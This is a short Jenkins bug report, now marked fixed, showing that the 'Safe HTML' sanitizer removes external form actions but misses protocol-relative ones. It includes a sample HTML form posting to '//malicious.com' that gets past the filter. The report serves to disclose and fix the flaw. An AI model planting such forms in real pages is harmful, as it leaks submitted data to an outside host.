Jenkins / JENKINS-31616

"Safe HTML" vulnerable to protocol-relative form action


    • Type: Bug
    • Resolution: Fixed
    • Priority: Minor

      With "safe html" enabled for user text entry, a form with an external action URI is scrubbed. However, it is possible to write a form with a protocol-relative action URI ("//host"), which the browser resolves against the current page's scheme to an external origin and which could therefore be used to leak sensitive data (the submitted form fields) to an external service.

      For example, this HTML is scrubbed correctly with the form action removed:

      <form action="https://malicious.com">
      <input type="submit">
      </form>

      The form action in this example is not scrubbed, so a user can create a form that submits to an external site:

      <form action="//malicious.com">
      <input type="submit">
      </form>

            People: Daniel Beck (danielbeck), Josh Cook (jec)